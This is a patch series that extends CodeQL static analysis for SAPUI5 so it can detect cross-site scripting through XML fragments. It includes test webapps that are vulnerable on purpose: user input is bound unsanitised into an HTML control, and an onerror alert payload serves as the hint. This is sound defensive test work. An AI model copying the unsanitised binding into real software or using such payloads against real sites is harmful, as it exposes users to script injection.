From 02c8edadb775e1c4e2101eee64fb600db03cc61e Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Wed, 10 Dec 2025 16:09:28 -0500
Subject: [PATCH 01/15] Add small investigative modelling for fragments - WIP

---
 .../javascript/frameworks/ui5/UI5View.qll     | 55 ++++++++++++++++++-
 1 file changed, 54 insertions(+), 1 deletion(-)

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index b7b57c7dc..221cb9315 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -187,6 +187,17 @@ predicate isBuiltInControl(string qualifiedTypeUri) {
   )
 }
 
+/**
+ * A UI5 Fragment that might include XSS sources and sinks in standard controls.
+ */
+abstract class UI5Fragment extends File {
+  abstract UI5Control getControl();
+
+  abstract UI5BindingPath getASource();
+
+  abstract UI5BindingPath getAnHtmlISink();
+}
+
 /**
  * A UI5 View that might include XSS sources and sinks in standard controls.
  */
@@ -683,8 +694,50 @@ class XmlView extends UI5View instanceof XmlFile {
   }
 }
 
+/**
+ * TODO - consider - if this just copies all predicates - maybe this should be a subtype of XmlView
+ * and we dont need a separate/parallel type for fragments vs views. this will become clear once 
+ */
+class XmlFragment extends UI5Fragment instanceof XmlFile {
+  XmlRootElement root;
+
+  XmlFragment() {
+    root = this.getARootElement() and
+    (
+      root.getNamespace().getUri() = "sap.m"
+      or
+      root.getNamespace().getUri() = "sap.ui.core"
+    ) and
+    root.hasName("FragmentDefinition")
+  }
+
+  override UI5Control getControl() {
+    exists(XmlElement element |
+      result.asXmlControl() = element and
+      /* Use getAChild+ because some controls nest other controls inside them as aggregations */
+      element = root.getAChild+() and
+      (
+        /* 1. A builtin control provided by UI5 */
+        isBuiltInControl(element.getNamespace().getUri())
+        or
+        /* 2. A custom control with implementation code found in the webapp */
+        exists(CustomControl control |
+          control.getName() = element.getNamespace().getUri() + "." + element.getName() and
+          inSameWebApp(control.getFile(), element.getFile())
+        )
+      )
+    )
+  }
+
+  override XmlBindingPath getASource() { none() }
+
+  override XmlBindingPath getAnHtmlISink() { none() }
+}
+
 private newtype TUI5Control =
-  TXmlControl(XmlElement control) or
+  TXmlControl(XmlElement control) {
+    control.getFile().getName().matches(["%.view.xml", "%.fragment.xml"])
+  } or
   TJsonControl(JsonObject control) {
     exists(JsonView view | control.getParent() = view.getRoot().getPropValue("content"))
   } or

From ad42e91becdacaf02074fed878bb48e37783fdb3 Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Tue, 16 Dec 2025 10:53:34 -0500
Subject: [PATCH 02/15] Fix controls in xml detection

---
 .../javascript/frameworks/ui5/UI5View.qll                 | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index 221cb9315..72e7d5b71 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -696,7 +696,7 @@ class XmlView extends UI5View instanceof XmlFile {
 
 /**
  * TODO - consider - if this just copies all predicates - maybe this should be a subtype of XmlView
- * and we dont need a separate/parallel type for fragments vs views. this will become clear once 
+ * and we dont need a separate/parallel type for fragments vs views. this will become clear once
  */
 class XmlFragment extends UI5Fragment instanceof XmlFile {
   XmlRootElement root;
@@ -736,7 +736,11 @@ class XmlFragment extends UI5Fragment instanceof XmlFile {
 
 private newtype TUI5Control =
   TXmlControl(XmlElement control) {
-    control.getFile().getName().matches(["%.view.xml", "%.fragment.xml"])
+    control
+        .(Locatable)
+        .getFile()
+        .getBaseName()
+        .matches(["%.view.xml", "%.view.html", "%.fragment.xml"])
   } or
   TJsonControl(JsonObject control) {
     exists(JsonView view | control.getParent() = view.getRoot().getPropValue("content"))

From 8f807756049af96ac121fddd9ec1975095af4606 Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Wed, 17 Dec 2025 12:21:59 -0500
Subject: [PATCH 03/15] Add simple testcase xss fragment in html view

---
 .../UI5Xss/xss-xml-fragment/UI5Xss.expected   |  0
 .../UI5Xss/xss-xml-fragment/UI5Xss.qlref      |  1 +
 .../UI5Xss/xss-xml-fragment/package-lock.json | 12 +++++++++++
 .../UI5Xss/xss-xml-fragment/package.json      |  5 +++++
 .../queries/UI5Xss/xss-xml-fragment/ui5.yaml  |  7 +++++++
 .../webapp/controller/app.controller.js       | 21 +++++++++++++++++++
 .../UI5Xss/xss-xml-fragment/webapp/index.html | 21 +++++++++++++++++++
 .../UI5Xss/xss-xml-fragment/webapp/index.js   | 11 ++++++++++
 .../xss-xml-fragment/webapp/manifest.json     |  5 +++++
 .../webapp/view/TestFragment.fragment.xml     |  9 ++++++++
 .../webapp/view/app.view.html                 |  6 ++++++
 11 files changed, 98 insertions(+)
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.qlref
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package-lock.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/ui5.yaml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.html
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/manifest.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html

diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected
new file mode 100644
index 000000000..e69de29bb
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.qlref b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.qlref
new file mode 100644
index 000000000..ce544f1d0
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.qlref
@@ -0,0 +1 @@
+UI5Xss/UI5Xss.ql
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package-lock.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package-lock.json
new file mode 100644
index 000000000..ba052860f
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package-lock.json
@@ -0,0 +1,12 @@
+{
+  "name": "sap-ui5-xss",
+  "version": "1.0.0",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "sap-ui5-xss",
+      "version": "1.0.0"
+    }
+  }
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package.json
new file mode 100644
index 000000000..9f0a4560b
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/package.json
@@ -0,0 +1,5 @@
+{
+  "name": "sap-ui5-xss",
+  "version": "1.0.0",
+  "main": "index.js"
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/ui5.yaml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/ui5.yaml
new file mode 100644
index 000000000..beb2ff69d
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/ui5.yaml
@@ -0,0 +1,7 @@
+specVersion: '3.0'
+metadata:
+  name: sap-ui5-xss
+type: application
+framework:
+  name: SAPUI5
+  version: "1.115.0"
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
new file mode 100644
index 000000000..db7b40f1f
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
@@ -0,0 +1,21 @@
+sap.ui.define([
+    "sap/ui/core/mvc/Controller",
+    "sap/ui/model/json/JSONModel"
+], function (Controller, JSONModel) {
+    "use strict"
+    return Controller.extend("codeql-sap-js.controller.app", {
+        onInit: function () {
+            var oData = {
+                input: null
+            };
+            var oModel = new JSONModel(oData);
+            this.getView().setModel(oModel);
+
+            this.fragment = this.loadFragment({
+                name: "codeql-sap-js.view.TestFragment"
+            }).then(function (oFragment) {
+                oFragment.placeAt("fragmentContainer");
+            }.bind(this));
+        }
+    });
+})
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.html
new file mode 100644
index 000000000..0d9daa387
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.html
@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+
+    <meta charset="utf-8">
+    <title>SAPUI5 XSS</title>
+    <script src="https://sdk.openui5.org/resources/sap-ui-core.js" 
+        data-sap-ui-libs="sap.m"
+        data-sap-ui-onInit="module:codeql-sap-js/index" 
+        data-sap-ui-resourceroots='{
+            "codeql-sap-js": "./"
+        }'>
+        </script>
+</head>
+
+<body class="sapUiBody" id="content">
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js
new file mode 100644
index 000000000..b9774f759
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js
@@ -0,0 +1,11 @@
+sap.ui.define([
+    "sap/ui/core/mvc/HTMLView"
+], function (HTMLView) {
+    "use strict";
+    HTMLView.create({
+        viewName: "codeql-sap-js.view.app"
+    }).then(function (oView) {
+        oView.placeAt("content");
+    });
+
+}); 
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/manifest.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/manifest.json
new file mode 100644
index 000000000..65d4de250
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/manifest.json
@@ -0,0 +1,5 @@
+{
+    "sap.app": {
+        "id": "sap-ui5-xss"
+    }
+}
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml
new file mode 100644
index 000000000..311fb7c6f
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/TestFragment.fragment.xml
@@ -0,0 +1,9 @@
+<core:FragmentDefinition
+	xmlns="sap.m"
+	xmlns:core="sap.ui.core"
+>
+<Input xmlns="sap.m"
+          description="Enter Payload - Try: &lt;img src=x onerror=alert(&quot;XSS&quot;)&gt;"
+          value="{/input}">
+     </Input>
+</core:FragmentDefinition>
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html
new file mode 100644
index 000000000..c835b8ef4
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/view/app.view.html
@@ -0,0 +1,6 @@
+<template data-controller-name="codeql-sap-js.controller.app">
+     <div id="fragmentContainer"/></div>
+     <div data-sap-ui-type="sap.ui.core.HTML" 
+          data-content="{/input}">
+     </div>
+</template>
\ No newline at end of file

From b0c1aef223c78dba51797c4790590b92ee159b0b Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Tue, 30 Dec 2025 12:29:42 -0500
Subject: [PATCH 04/15] Add Fragment load model and test cases for basic xss

---
 .../javascript/frameworks/ui5/Fragment.qll    | 51 +++++++++++++++
 .../javascript/frameworks/ui5/UI5View.qll     | 65 +++++++++++++++++--
 .../xss-xml-fragment-load/UI5Xss.expected     | 13 ++++
 .../UI5Xss/xss-xml-fragment-load/UI5Xss.qlref |  1 +
 .../xss-xml-fragment-load/package-lock.json   | 12 ++++
 .../UI5Xss/xss-xml-fragment-load/package.json |  5 ++
 .../UI5Xss/xss-xml-fragment-load/ui5.yaml     |  7 ++
 .../webapp/controller/app.controller.js       | 25 +++++++
 .../xss-xml-fragment-load/webapp/index.html   | 21 ++++++
 .../xss-xml-fragment-load/webapp/index.js     | 11 ++++
 .../webapp/manifest.json                      |  5 ++
 .../webapp/view/TestFragment.fragment.xml     |  9 +++
 .../webapp/view/app.view.html                 |  6 ++
 .../UI5Xss/xss-xml-fragment/UI5Xss.expected   | 13 ++++
 .../webapp/view/TestFragment.fragment.xml     |  2 +-
 .../webapp/view/app.view.html                 |  4 +-
 16 files changed, 241 insertions(+), 9 deletions(-)
 create mode 100644 javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.expected
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.qlref
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package-lock.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/ui5.yaml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.html
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/manifest.json
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml
 create mode 100644 javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
new file mode 100644
index 000000000..86e657e4a
--- /dev/null
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/Fragment.qll
@@ -0,0 +1,51 @@
+/**
+ * Provides classes for modeling the sap.ui.core.Fragment API.
+ */
+
+import javascript
+import DataFlow
+import advanced_security.javascript.frameworks.ui5.UI5
+
+/**
+ * Gets a reference to the Fragment module import.
+ */
+class FragmentLoad extends InvokeNode, MethodCallNode {
+  FragmentLoad() {
+    this =
+      TypeTrackers::hasDependency(["sap/ui/core/Fragment", "sap.ui.core.Fragment"])
+          .getAMemberCall("load")
+    or
+    exists(RequiredObject requiredModule, SapDefineModule sapModule |
+      this = requiredModule.asSourceNode().getAMemberCall("load") and
+      //ensure it is an sap module define
+      requiredModule.getEnclosingFunction() = sapModule.getArgument(1)
+    )
+  }
+
+  /**
+   * Gets the configuration object passed to Fragment.load().
+   */
+  DataFlow::Node getConfigObject() { result = this.getArgument(0) }
+
+  /**
+   * Gets the 'name' property value from the config object.
+   * This specifies the fragment resource to load (e.g., "my.app.fragments.MyFragment").
+   */
+  DataFlow::Node getNameArgument() {
+    exists(DataFlow::ObjectLiteralNode config |
+      config = this.getConfigObject().getALocalSource() and
+      result = config.getAPropertyWrite("name").getRhs()
+    )
+  }
+
+  /**
+   * Gets the 'controller' property value from the config object.
+   * This specifies the fragment's controller, if it has one.
+   */
+  DataFlow::Node getControllerArgument() {
+    exists(DataFlow::ObjectLiteralNode config |
+      config = this.getConfigObject().getALocalSource() and
+      result = config.getAPropertyWrite("controller").getRhs()
+    )
+  }
+}
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
index 72e7d5b71..3abf3db77 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5View.qll
@@ -4,6 +4,7 @@ import advanced_security.javascript.frameworks.ui5.UI5
 import advanced_security.javascript.frameworks.ui5.dataflow.DataFlow
 private import semmle.javascript.frameworks.data.internal.ApiGraphModelsExtensions as ApiGraphModelsExtensions
 import advanced_security.javascript.frameworks.ui5.Bindings
+import advanced_security.javascript.frameworks.ui5.Fragment
 
 /**
  * Gets the immediate supertype of a given type from the extensible predicate `typeModel` provided by
@@ -695,10 +696,9 @@ class XmlView extends UI5View instanceof XmlFile {
 }
 
 /**
- * TODO - consider - if this just copies all predicates - maybe this should be a subtype of XmlView
- * and we dont need a separate/parallel type for fragments vs views. this will become clear once
+ * An xml fragment. It may or may not have controllers associated.
  */
-class XmlFragment extends UI5Fragment instanceof XmlFile {
+class XmlFragment extends UI5View instanceof XmlFile {
   XmlRootElement root;
 
   XmlFragment() {
@@ -711,6 +711,35 @@ class XmlFragment extends UI5Fragment instanceof XmlFile {
     root.hasName("FragmentDefinition")
   }
 
+  override XmlBindingPath getASource() {
+    exists(XmlElement control, string type, string path, string property |
+      type = result.getControlTypeName() and
+      this = control.getFile() and
+      ApiGraphModelsExtensions::sourceModel(getASuperType(type), path, "remote", _) and
+      property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
+      result.getBindingTarget() = control.getAttribute(property)
+    )
+  }
+
+  override XmlBindingPath getAnHtmlISink() {
+    exists(XmlElement control, string type, string path, string property |
+      this = control.getFile() and
+      type = result.getControlTypeName() and
+      ApiGraphModelsExtensions::sinkModel(getASuperType(type), path, "ui5-html-injection", _) and
+      property = path.replaceAll(" ", "").regexpCapture("Member\\[([^\\]]+)\\]", 1) and
+      result.getBindingTarget() = control.getAttribute(property) and
+      /* If the control is an `sap.ui.core.HTML` then the control should be missing the `sanitizeContent` attribute */
+      (
+        getASuperType(type) = "HTMLControl"
+        implies
+        (
+          not exists(control.getAttribute("sanitizeContent")) or
+          control.getAttribute("sanitizeContent").getValue() = "false"
+        )
+      )
+    )
+  }
+
   override UI5Control getControl() {
     exists(XmlElement element |
       result.asXmlControl() = element and
@@ -729,9 +758,33 @@ class XmlFragment extends UI5Fragment instanceof XmlFile {
     )
   }
 
-  override XmlBindingPath getASource() { none() }
-
-  override XmlBindingPath getAnHtmlISink() { none() }
+  /**
+   * This is either known in the location from which `loadFragment` is called (in a controller's init function)
+   * OR in the optional controller param of `Fragment.load`.
+   * This MAY return no value, when the fragment is not associated to any controller.
+   * When this returns a value it is guaranteed that this xml fragment is instantiated.
+   */
+  override string getControllerName() {
+    exists(CustomController controller, MethodCallNode loadFragmentCall |
+      loadFragmentCall.getMethodName() = "loadFragment" and
+      controller.getAThisNode().flowsTo(loadFragmentCall.getReceiver()) and
+      controller.getName() = result
+    )
+    or
+    exists(CustomController controller, FragmentLoad fragmentLoad |
+      controller.getAThisNode().flowsTo(fragmentLoad.getControllerArgument()) and
+      /*
+       * extracting just the base name of the fragment (not the fully qualified)
+       * otherwise difficult to know which part of absolute path is only for the qualified name
+       */
+
+      fragmentLoad
+          .getNameArgument()
+          .getStringValue()
+          .matches("%" + this.getBaseName().replaceAll(".fragment.xml", "")) and
+      controller.getName() = result
+    )
+  }
 }
 
 private newtype TUI5Control =
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.expected b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.expected
new file mode 100644
index 000000000..3e379748b
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.expected
@@ -0,0 +1,13 @@
+nodes
+| webapp/controller/app.controller.js:10:17:10:27 | input: null |
+| webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} |
+| webapp/view/app.view.html:4:11:4:33 | data-content={/input} |
+edges
+| webapp/controller/app.controller.js:10:17:10:27 | input: null | webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} |
+| webapp/controller/app.controller.js:10:17:10:27 | input: null | webapp/view/app.view.html:4:11:4:33 | data-content={/input} |
+| webapp/controller/app.controller.js:12:26:12:45 | new JSONModel(oData) | webapp/view/app.view.html:4:11:4:33 | data-content={/input} |
+| webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | webapp/controller/app.controller.js:10:17:10:27 | input: null |
+| webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | webapp/controller/app.controller.js:12:26:12:45 | new JSONModel(oData) |
+| webapp/view/app.view.html:4:11:4:33 | data-content={/input} | webapp/controller/app.controller.js:10:17:10:27 | input: null |
+#select
+| webapp/view/app.view.html:4:11:4:33 | data-content={/input} | webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | webapp/view/app.view.html:4:11:4:33 | data-content={/input} | XSS vulnerability due to $@. | webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} | user-provided value |
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.qlref b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.qlref
new file mode 100644
index 000000000..ce544f1d0
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/UI5Xss.qlref
@@ -0,0 +1 @@
+UI5Xss/UI5Xss.ql
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package-lock.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package-lock.json
new file mode 100644
index 000000000..ba052860f
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package-lock.json
@@ -0,0 +1,12 @@
+{
+  "name": "sap-ui5-xss",
+  "version": "1.0.0",
+  "lockfileVersion": 3,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "sap-ui5-xss",
+      "version": "1.0.0"
+    }
+  }
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package.json
new file mode 100644
index 000000000..9f0a4560b
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/package.json
@@ -0,0 +1,5 @@
+{
+  "name": "sap-ui5-xss",
+  "version": "1.0.0",
+  "main": "index.js"
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/ui5.yaml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/ui5.yaml
new file mode 100644
index 000000000..beb2ff69d
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/ui5.yaml
@@ -0,0 +1,7 @@
+specVersion: '3.0'
+metadata:
+  name: sap-ui5-xss
+type: application
+framework:
+  name: SAPUI5
+  version: "1.115.0"
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
new file mode 100644
index 000000000..5c5ca3d72
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
@@ -0,0 +1,25 @@
+sap.ui.define([
+    "sap/ui/core/mvc/Controller",
+    "sap/ui/model/json/JSONModel",
+    "sap/ui/core/Fragment"
+], function (Controller, JSONModel, Fragment) {
+    "use strict"
+    return Controller.extend("codeql-sap-js.controller.app", {
+        onInit: function () {
+            var oData = {
+                input: null
+            };
+            var oModel = new JSONModel(oData);
+            this.getView().setModel(oModel);
+
+            Fragment.load({
+                name: "codeql-sap-js.view.TestFragment",
+                controller: this,
+                id: this.getView().getId()
+            }).then(function (oFragment) {
+                this.getView().addDependent(oFragment);
+                oFragment.placeAt("fragmentContainer");
+            }.bind(this));
+        }
+    });
+})
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.html
new file mode 100644
index 000000000..0d9daa387
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.html
@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+
+    <meta charset="utf-8">
+    <title>SAPUI5 XSS</title>
+    <script src="https://sdk.openui5.org/resources/sap-ui-core.js" 
+        data-sap-ui-libs="sap.m"
+        data-sap-ui-onInit="module:codeql-sap-js/index" 
+        data-sap-ui-resourceroots='{
+            "codeql-sap-js": "./"
+        }'>
+        </script>
+</head>
+
+<body class="sapUiBody" id="content">
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js
new file mode 100644
index 000000000..b9774f759
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js
@@ -0,0 +1,11 @@
+sap.ui.define([
+    "sap/ui/core/mvc/HTMLView"
+], function (HTMLView) {
+    "use strict";
+    HTMLView.create({
+        viewName: "codeql-sap-js.view.app"
+    }).then(function (oView) {
+        oView.placeAt("content");
+    });
+
+}); 
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/manifest.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/manifest.json
new file mode 100644
index 000000000..65d4de250
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/manifest.json
@@ -0,0 +1,5 @@
+{
+    "sap.app": {
+        "id": "sap-ui5-xss"
+    }
+}
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml
new file mode 100644
index 000000000..7c84f45e2
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml
@@ -0,0 +1,9 @@
+<core:FragmentDefinition
+	xmlns="sap.m"
+	xmlns:core="sap.ui.core"
+>
+<Input xmlns="sap.m"
+          description="Enter Payload - Try: &lt;img src=x onerror=alert(&quot;XSS&quot;)&gt;"
+          value="{/input}"> <!--User input source sap.m.Input.value -->
+     </Input>
+</core:FragmentDefinition>
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html
new file mode 100644
index 000000000..f23bf693f
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html
@@ -0,0 +1,6 @@
+<template data-controller-name="codeql-sap-js.controller.app">
+     <div id="fragmentContainer"></div>
+     <div data-sap-ui-type="sap.ui.core.HTML" 
+          data-content="{/input}"> <!--XSS sink sap.ui.core.HTML.content -->
+     </div>
+</template>
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected
index e69de29bb..de5a04972 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/UI5Xss.expected
@@ -0,0 +1,13 @@
+nodes
+| webapp/controller/app.controller.js:9:17:9:27 | input: null |
+| webapp/view/TestFragment.fragment.xml:5:1:7:28 | value={/input} |
+| webapp/view/app.view.html:4:11:4:33 | data-content={/input} |
+edges
